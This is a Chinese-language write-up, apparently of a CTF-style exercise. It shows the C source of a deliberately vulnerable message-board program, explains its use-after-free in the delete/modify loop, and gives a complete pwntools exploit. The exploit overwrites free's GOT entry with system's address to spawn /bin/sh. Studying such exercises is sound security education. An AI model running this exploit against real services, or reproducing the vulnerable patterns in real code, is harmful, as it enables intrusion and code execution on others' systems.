本文共 13315 字,大约阅读时间需要 44 分钟。
#include #include #include #include #include #include struct Message { int reply_count; struct Message* nextMsg; int msgid; char* author; int author_size; char* title; int title_size; char* content; int content_size; int total_num;};struct Message * head, *tail;char input_buffer[0x1000];void read_input(char * buf, int read_len, int buf_size) { if (NULL == buf || read_len <= 0) return; memset(buf, 0, buf_size); int i = 0; char temp_char; while (1) { temp_char = getchar(); if (i < read_len) buf[i] = temp_char; if (temp_char == 0xA) break; i++; }} uint32_t read_input_uint(char *buf, int read_len, int buf_size) { read_input(buf, read_len, buf_size); return strtoul(buf, 0, 10);}void insertMessage(int messageId) { struct Message* tmp = head; while (tmp->nextMsg != tail) { tmp = tmp->nextMsg; } struct Message * new_msg; new_msg = (struct Message *) malloc(sizeof(struct Message)); new_msg->msgid = messageId; write(STDOUT_FILENO, "input you name len:\n", 20); new_msg->author_size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); new_msg->author = (char *) malloc(new_msg->author_size); write(STDOUT_FILENO, "input you name:\n", 16); read_input(new_msg->author, new_msg->author_size, new_msg->author_size); write(STDOUT_FILENO, "input you title len:\n", 21); new_msg->title_size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); new_msg->title = (char *) malloc(new_msg->title_size); write(STDOUT_FILENO, "input you title:\n", 17); read_input(new_msg->title, new_msg->title_size, new_msg->title_size); write(STDOUT_FILENO, "input you content len:\n", 23); new_msg->content_size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); new_msg->content = (char *) malloc(new_msg->content_size); write(STDOUT_FILENO, "input you content:\n", 19); read_input(new_msg->content, new_msg->content_size, new_msg->content_size); new_msg->nextMsg = tmp->nextMsg; tmp->nextMsg = new_msg;}struct Message * print_msg(int msgid) { struct Message* tmp = head; while (tmp != tail) { if (tmp->msgid == msgid) { write(STDOUT_FILENO, "msg author:", 11); write(STDOUT_FILENO, tmp->author, tmp->author_size); write(STDOUT_FILENO, ",msg title:", 11); write(STDOUT_FILENO, tmp->title, tmp->title_size); write(STDOUT_FILENO, ",msg content:", 13); write(STDOUT_FILENO, tmp->content, tmp->content_size); //write(STDOUT_FILENO, ",msg reply count:", 17); //write(STDOUT_FILENO, tmp->reply_count, 4); write(STDOUT_FILENO, "\n", 1); /*printf( "\nmsg author:%s, msg title %s,msg content %s, msg reply count %d\n", tmp->author, tmp->title, tmp->content, tmp->reply_count);*/ return tmp; } tmp = tmp->nextMsg; } return NULL;}void delete_msg(struct Message * delmsg) { //delete linked list msg and free struct Message* tmp = head; while (tmp->nextMsg != delmsg) { tmp = tmp->nextMsg; } tmp->nextMsg = delmsg->nextMsg; //free free(delmsg->author); free(delmsg->content); free(delmsg->title); free(delmsg);}void modify_msg(struct Message * modifymsg) { int size = 0; char temp[0x100]; write(STDOUT_FILENO, "input new name len:\n", 20); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new name:\n", 16); read_input(temp, size, 0x100); memcpy(modifymsg->author, temp, size); modifymsg->author_size= size; write(STDOUT_FILENO, "input new title len:\n", 21); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new title:\n", 17); read_input(temp, size, 0x100); memcpy(modifymsg->title, temp, size); modifymsg->title_size= size; write(STDOUT_FILENO, "input new content len:\n", 23); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new content:\n", 19); read_input(temp, size, 0x100); modifymsg->content = (char *) malloc(size); memcpy(modifymsg->content, temp, size); modifymsg->content_size= size;}void main() { struct Message HEAD, TAIL; head = &HEAD; tail = &TAIL; head->nextMsg = tail; head->msgid = 0; tail->nextMsg = NULL; tail->msgid = -1; char usage[128] = "1.leave your message, 2.read the message,3.exit; please input you choice.\n"; char operate_usage[80] = "Please select the operate: 1.delete 2.modify 3.add reply 4.back\n"; int cmd = 0, msg_count = 0, operate = 0; while (1) { write(STDOUT_FILENO, usage, strlen(usage)); read_input(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); sscanf(input_buffer, "%d", &cmd); switch (cmd) { case 1: //添加留言 msg_count++; insertMessage(msg_count); break; case 2: write(STDOUT_FILENO, "input msgid will read:\n", 23); int read_msg_id = 0; read_input(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); sscanf(input_buffer, "%d", &read_msg_id); struct Message * read_msg = print_msg(read_msg_id); if (read_msg == NULL) { //write(STDOUT_FILENO, "msgid error\n", 12); return; } while (1) { write(STDOUT_FILENO, operate_usage, strlen(operate_usage)); operate = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); //sscanf(input_buffer, "%d", &operate); if (operate == 1) { delete_msg(read_msg); } else if (operate == 2) { modify_msg(read_msg); } else if (operate == 3) { read_msg->reply_count++; } else if (operate == 4) { break; } } break; case 3: write(STDOUT_FILENO, "exit\n", 5); return; } } }
your message, 2.read the message,3.exit; please input you choice.1
you name len:4
you name:test
you title len:4
you title:test
you content len:5
you content:hello
your message, 2.read the message,3.exit; please input you choice.2
msgid will read:1
author:test,msg title:test,msg content:helloPlease
select the operate: 1.delete 2.modify 3.add reply 4.back2
new name len:5
new name:daizy
new title len:5
new title:hello
new content len:11
new content:hello,daizy
select the operate: 1.delete 2.modify 3.add reply 4.back4
your message, 2.read the message,3.exit; please input you choice.2
msgid will read:1
author:daizy,msg title:hello,msg content:hello,daizyPlease
select the operate: 1.delete 2.modify 3.add reply 4.back1
select the operate: 1.delete 2.modify 3.add reply 4.back4
your message, 2.read the message,3.exit; please input you choice.3
exitwhile (1) { write(STDOUT_FILENO, operate_usage, strlen(operate_usage)); operate = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); //sscanf(input_buffer, "%d", &operate); if (operate == 1) { delete_msg(read_msg); } else if (operate == 2) { modify_msg(read_msg); } else if (operate == 3) { read_msg->reply_count++; } else if (operate == 4) { break; } }
void delete_msg(struct Message * delmsg) { //delete linked list msg and free struct Message* tmp = head; while (tmp->nextMsg != delmsg) { tmp = tmp->nextMsg; } tmp->nextMsg = delmsg->nextMsg; //free free(delmsg->author); free(delmsg->content); free(delmsg->title); free(delmsg);}
modify_msg函数如下 :void modify_msg(struct Message * modifymsg) { int size = 0; char temp[0x100]; write(STDOUT_FILENO, "input new name len:\n", 20); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new name:\n", 16); read_input(temp, size, 0x100); memcpy(modifymsg->author, temp, size); modifymsg->author_size= size; write(STDOUT_FILENO, "input new title len:\n", 21); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new title:\n", 17); read_input(temp, size, 0x100); memcpy(modifymsg->title, temp, size); modifymsg->title_size= size; write(STDOUT_FILENO, "input new content len:\n", 23); size = read_input_uint(input_buffer, sizeof(input_buffer), sizeof(input_buffer)); if (size > 0x100) return; write(STDOUT_FILENO, "input new content:\n", 19); read_input(temp, size, 0x100); modifymsg->content = (char *) malloc(size); //新分配一个content memcpy(modifymsg->content, temp, size); modifymsg->content_size= size;}
接着会将用户输入的内容(content)拷贝到content指针中,即我们构造的恶意内容,覆盖了原来的Message中的char* author、char* title等地址内容。
整个msg变化过程,如下图所示: 在循环代码中,modify_msg完之后可以继续进入modify_msg,此时msg中相关地址,如author、title和content地址已经变成free函数在got表中的位置,也就是我们输入的内容可以覆盖GOT表!我们把free函数的GOT表地址覆盖成system函数地址,下次在执行free函数时,就会执行system函数,从而达到命令执行。最终漏洞的exp代码如下:
#!/usr/bin/env pythonfrom pwn import * __author__="daizy" def add_new_msg(cmd, name_len, name, title_len, title, content_len, content): p.recvuntil("\n") cmd = str(cmd)+ "\n" p.send(cmd) p.recvuntil("\n") #input name size p.send(str(name_len) + "\n") p.recvuntil("\n") # input name p.send(name + "\n") p.recvuntil("\n") #input title size p.send(str(title_len) + "\n") p.recvuntil("\n") # input title p.send(title + "\n") p.recvuntil("\n") #input content size p.send(str(content_len) + "\n") p.recvuntil("\n") # input content p.send(content + "\n")def print_msg(cmd, msg_index): p.recvuntil("\n") cmd = str(cmd)+ "\n" p.send(cmd) p.recvuntil("\n") cmd = str(msg_index)+ "\n" p.send(cmd) p.recvuntil("\n") #print msg infodef delete_msg(cmd): p.recvuntil("\n") cmd = str(cmd)+ "\n" p.send(cmd)def modify_msg(cmd, name_len, name, title_len, title, content_len, content): p.recvuntil("\n") cmd = str(cmd)+ "\n" p.send(cmd) p.recvuntil("\n") #input new name size p.send(str(name_len) + "\n") p.recvuntil("\n") # input new name p.send(name + "\n") p.recvuntil("\n") #input new title size p.send(str(title_len) + "\n") p.recvuntil("\n") # input new title p.send(title + "\n") p.recvuntil("\n") #input new content size p.send(str(content_len) + "\n") p.recvuntil("\n") # input new content p.send(content + "\n")def back_msg_main(cmd): p.recvuntil("\n") cmd = str(cmd) + "\n" p.send(cmd) if __name__ == "__main__": libc = ELF('libc.so') elf = ELF('uaf') p = process('./uaf') #p = remote('', 15000) libc_system = libc.symbols['system'] libc_free = libc.symbols['free'] offset_sys_free = libc_system - libc_free print '\noffset_sys_free= ' + hex(offset_sys_free) got_free = elf.got['free'] print '\ngot_free= ' + hex(got_free) #step 1 add two msg,msg two's author,title,content is /bin/sh print "\nadd new msg" add_new_msg(1, 4,"test", 4, "test", 5, "hello") add_new_msg(1, 7,"/bin/sh", 7,"/bin/sh", 7,"/bin/sh") #step2 print the new msg print "\n step2 print msg by msgid" print_msg(2, 1) #step3 delete the new msg print "\n setp3 delete msg" delete_msg(1) #step4 modify the delete msg print "\n step4 modify msg" content = "c"*12 + p32(got_free) + "c"*4+p32(got_free) + "c"*4+p32(got_free) + "c"*8 modify_msg(2, 4, "test", 4, "test", 40, content) #step5 calculate system address and second modify the delete msg to write system address to got.free print "\nstep5 calculate system address and write to got.free" free_addr = int(raw_input("free address:"), 16) system_addr = free_addr + offset_sys_free modify_msg(2, 4, p32(system_addr), 4, p32(system_addr), 4, p32(system_addr)) #step 6 exit msg operate and back to add new msg print "\nback to msg main" back_msg_main(4) #step 7 free('/bin/sh') ->system('/bin/sh') print "\nfree('/bin/sh') ->system('/bin/sh')" #print "\nprint new msg2" print_msg(2, 2) #print "\n free new msg2->system" delete_msg(1) p.interactive()
-pid 5519获得,得到free函数地址后,需要退出gdb程序,否则主程序无法进行下一步。当然也可以通过指定一个free函数地址,爆破n次,也可以获得成功。
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